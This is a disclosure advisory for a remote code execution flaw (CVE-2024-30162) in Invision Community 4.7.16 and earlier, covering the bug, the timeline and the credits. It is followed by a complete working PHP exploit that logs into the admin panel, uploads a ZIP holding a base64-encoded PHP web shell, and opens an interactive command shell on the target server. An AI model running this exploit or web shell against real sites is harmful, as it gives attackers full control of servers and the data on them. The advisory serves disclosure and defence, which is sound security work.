------------------------------------------------------------------------------
Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability
------------------------------------------------------------------------------[-] Software Link:
https://invisioncommunity.com
[-] Affected Versions:
Version 4.7.16 and prior versions.
[-] Vulnerability Description:
The vulnerability is located in the
/applications/core/modules/admin/editor/toolbar.php script.
Specifically, into the
IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will
handle
the upload of a ZIP file, trying to extract its content into the
/applications/core/interface/ckeditor/ckeditor/plugins/ directory; if
the ZIP archive does not include
a plugin.js file, then the extracted ZIP content will be recursively
deleted from the file system,
otherwise it will stay there. This can be exploited to execute
arbitrary PHP code by uploading a
ZIP archive containing a plugin.js file (which can also be empty)
along with a PHP file. Successful
exploitation of this vulnerability requires an Administrator account
having the "toolbar_manage" permission.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2024-30162.php
[-] Solution:
No official solution is currently available.
[-] Disclosure Timeline:
[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure
[12/03/2024] - Version 4.7.16 released, but the issue is still not fixed
[20/03/2024] - CVE identifier requested
[24/03/2024] - CVE identifier assigned
[05/04/2024] - Coordinated public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2024-30162 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Other References:
https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/
[-] Original Advisory:
http://karmainsecurity.com/KIS-2024-03
-----------------------
PoC:
<?php
/*
------------------------------------------------------------------------------
Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability
------------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://invisioncommunity.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerability Description:
The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script.
Specifically, into the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will
handle the upload of a ZIP file, trying to extract its content into the
/applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does
not include a plugin.js file, then the extracted ZIP content will be recursively deleted
from the file system, otherwise it will stay there. This can be exploited to execute
arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can
also be empty) along with a PHP file. Successful exploitation of this vulnerability
requires an Administrator account having the "toolbar_manage" permission.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2024-03
*/
set_time_limit(0);
error_reporting(E_ERROR);
if (!extension_loaded("curl")) die("[-] cURL extension required!\n");
if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Email> <Password>\n\n");
$url = $argv[1];
$email = $argv[2];
$passwd = $argv[3];
$ch = curl_init();
@unlink('./cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');
print "[+] Logging into AdminCP\n";
curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login");
curl_setopt($ch, CURLOPT_POST, false);
if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");
curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword");
if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n");
print "[+] Uploading malicious ZIP file\n";
curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin");
curl_setopt($ch, CURLOPT_POST, false);
if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");
$plg = md5(time()).".zip";
@file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA="));
$params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)];
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n");
print "[+] Launching shell\n";
curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/");
curl_setopt($ch, CURLOPT_POST, false);
$phpcode = "print '____'; passthru(base64_decode('%s')); print '____';";
while(1)
{
print "\ninvision-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}